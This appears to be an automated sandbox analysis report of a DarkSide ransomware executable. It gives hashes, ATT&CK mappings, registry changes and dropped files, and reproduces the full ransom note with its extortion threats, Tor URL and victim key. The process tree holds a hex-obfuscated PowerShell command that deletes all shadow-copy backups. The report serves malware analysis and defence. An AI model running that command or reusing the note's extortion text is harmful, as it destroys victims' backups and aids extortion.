darkside | 0f808fd3ecf9d722aafeee46b57aad4d07f39c98be6f6148be979ed470cf0a99

Resubmissions

27-01-2024 19:37

240127-yb5pksafd3 10

27-01-2024 19:36

240127-ybqwesafc2 10

12-05-2021 15:56

210512-db4t7vmwas 10

Analysis

max time kernel
119s
max time network
124s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
27-01-2024 19:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Size

59KB
MD5

e44450150e8683a0addd5c686cd4d202
SHA1

8c482a0eed33c8a4542c3cb2715a242f2259343d
SHA256

691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5
SHA512

7d65d22ad630fd77c50e277a44fdcc46fa86235c93524f9751ac9ddf0ce19261707fab631108fc908a71029900dbf6ada119d607edfadc3ce309f86a9c3765fe
SSDEEP

768:Qbj6iIq6oSqww3/T8K5UWCTxdCCDSbVrdNcxGV1ylwPhpuc:s6VqwwvAKa/TxoCODTV1ylEc

Score

10^/10

darkside ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\Admin\README.3d4850a4.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. We downloaded a lot of interesting data from your network. If you need proofs, we are ready to give it. The data is preloaded and will be automatically published if you don’t pay. Your data will be available after automatic publication for free downloading at least 6 months at our tor cdn servers. If within 3 days you don't contact with us, we will send press-releases about this accident to major media outlets, after another 3 days after sending press-releases we will start to upload your private data. Here is the list of information that we copied from your network: Passports and visas from: DOCUMENTS-RED SEA PROJECT DOCUMENTS-VISIT VISA EMPLOYEES IQAMA & PASSPORTS FOR SWAB TEST SCAN DOCUMENTS Contracts and passports as well as test results for SARS-COV19 from: CONTRACT COVID 19 Status Report Passport and photo Accounting & Financing We also copied information from the following departments: RAKFIN RAKHSE RSPDC RSPFIN RSPQLTP RSPSTO RSPTEC SAJSPFIN RSPQLT RAKEENG We paid a lot of attention to the personal data of employees as well as the drawings of your projects You must understand that if information about your developments gets publicly available: 1) your clients data can be used by criminals 2) your clients will fill lawsuit against you 3) government regulators will fine you for data breach, if you have in clients at least one EU resident then you will be also fined by EU government by GDPR law with millions of dollars of fine or permit ban for working with EU citizents. US has the similar laws, but they are not so costly, however the total cost will exceed the asked amount from you, so our offer is the best deal for you to resolve this issue. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/3NQA47J490NLKJVB1FI43HHCEJO62CE3E440J4H4K564VRQ8AFONVJQOM8158NR3 When you open our website, put the following data in the input form: Key: zm7QxFcBLUS2PdXT2XI4gIg6FuXOMT67rYgWK4ZdNE3jt6R6skLNBCiW7ryVA7ej438jGLsBzZ1mog9YLjglfFG3Ezw57Ks0jJQZMO2AokEchnlupHVbK7ZTlk4kDSMP79vNfLUDI8ppzxNTOtcWQLTtzxCI7zb6ufHXbQe5xQUJvwTJbRVmcNib462NddZoyQ0zjKh8GsEPEfQBCkTtiYR8aVMlr0GBQKzQvDmmBks9y0IupRiKMbGf607vVNegtZXEUFXOfhQfnUwOYUAkX4t83P4eQKbPaFTYpasoEC7Xm0XU1SaX3KAagaqDaIH69YQYZOJZaTrc5NtsPPRH7R1HlOMZP2bC3GMsbLaK91saXy9FcDZpn9AFkVVQHlV9xov5GzZ5GMtxb9QUcpth5a12WpVKpi5wdKNc3H3Q4jNqQjkxUJcM35X9Dkie8LKOYvC039zvnTcClzqhNza6mXhgcd7rGSWQZ6EoJ9yn6LOEf8bwjIoHrGqoYQwS6F7ZWeLd5VtbUGE7iObjGj6vdFjqhKLOxeuNhGx4ZyZ5ZR6e5K7uvLZWmYq !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidfqzcuhtk2.onion/3NQA47J490NLKJVB1FI43HHCEJO62CE3E440J4H4K564VRQ8AFONVJQOM8158NR3

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside
Renames multiple (150) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\3d4850a4.BMP"	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\3d4850a4.BMP"	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe

Modifies Control Panel 1 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Control Panel\Desktop\WallpaperStyle = "10"	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe

Modifies registry class 5 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\3d4850a4\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\3d4850a4.ico"	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.3d4850a4	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.3d4850a4\ = "3d4850a4"	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\3d4850a4\DefaultIcon	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\3d4850a4	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
2584	powershell.exe
2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: SeSecurityPrivilege	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: SeTakeOwnershipPrivilege	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: SeLoadDriverPrivilege	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: SeSystemProfilePrivilege	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: SeSystemtimePrivilege	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: SeProfSingleProcessPrivilege	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: SeIncBasePriorityPrivilege	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: SeCreatePagefilePrivilege	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: SeBackupPrivilege	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: SeRestorePrivilege	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: SeShutdownPrivilege	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: SeDebugPrivilege	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: SeSystemEnvironmentPrivilege	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: SeRemoteShutdownPrivilege	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: SeUndockPrivilege	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: SeManageVolumePrivilege	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: 33	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: 34	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: 35	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
Token: SeDebugPrivilege	2584	powershell.exe
Token: SeBackupPrivilege	2964	vssvc.exe
Token: SeRestorePrivilege	2964	vssvc.exe
Token: SeAuditPrivilege	2964	vssvc.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2240 wrote to memory of 2584	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe	29
PID 2240 wrote to memory of 2584	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe	29
PID 2240 wrote to memory of 2584	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe	29
PID 2240 wrote to memory of 2584	2240	691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe	29

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe
"C:\Users\Admin\AppData\Local\Temp\691515a485b0b3989fb71c6807e640eeec1a0e30d90500db6414035d942f70a5.exe"
1⤵
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2584

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2964

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
ef585b3bc54b1cc4978a767098d76dcc

SHA1
fd49238134d220ac9e730185297d1784be7b069e

SHA256
b5122ad929badeaafb6a4afe9df7f907204b69162eb0c8605306afab8a89016b

SHA512
ebb342c02894e39b54e5ab0f86ea716e0b808cbf33d3c96d00b0d6d69d56cf22b945578975e79d27e53ecf667a68fd95a5b9be991e436657e15276781ffed851

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab44C0.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarAD45.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
480d0b24e99354e5da6cca552bedf2bc

SHA1
14a3ec6eed319e8ba5384eeaecd5c408fb47d5aa

SHA256
4d00b8c3c83a78294b62e6717a2ef5907df7b5196786e305600fa64fc3fd4723

SHA512
67662c643ad1dc8c9b0b41b8f17ccbe34f65031a5d4874603acf0ed3cc9b86a2a6fbcdb52b4a7977ca6d36b723c46bdee19e4a18104d29d4ea8d173aa7758fa0

Download Submit
C:\Users\Admin\README.3d4850a4.TXT

Filesize
3KB

MD5
322ab684a86474788f50834ee39109a9

SHA1
923f7207c35953a432367ea7f81eece15a154a6a

SHA256
0afc4ee409633e3dcfc5185a9d61c9302090099761951b5566cbd69370d85e27

SHA512
37d62ce14ff10c59b8f047bf618cedf666ba450303fddeba9dc42fdeb8d1da5f5ece5fd513e6772508a7a7c2f0975a778bf257cda1fd8b2bb605efb12a474178

Download Submit
memory/2584-22-0x0000000002590000-0x0000000002598000-memory.dmp

Filesize
32KB

Download
memory/2584-26-0x0000000002950000-0x00000000029D0000-memory.dmp

Filesize
512KB

Download
memory/2584-27-0x000007FEF4A30000-0x000007FEF53CD000-memory.dmp

Filesize
9.6MB

Download
memory/2584-28-0x0000000002950000-0x00000000029D0000-memory.dmp

Filesize
512KB

Download
memory/2584-29-0x000007FEF4A30000-0x000007FEF53CD000-memory.dmp

Filesize
9.6MB

Download
memory/2584-25-0x0000000002950000-0x00000000029D0000-memory.dmp

Filesize
512KB

Download
memory/2584-24-0x0000000002950000-0x00000000029D0000-memory.dmp

Filesize
512KB

Download
memory/2584-23-0x000007FEF4A30000-0x000007FEF53CD000-memory.dmp

Filesize
9.6MB

Download
memory/2584-21-0x000000001B290000-0x000000001B572000-memory.dmp

Filesize
2.9MB

Download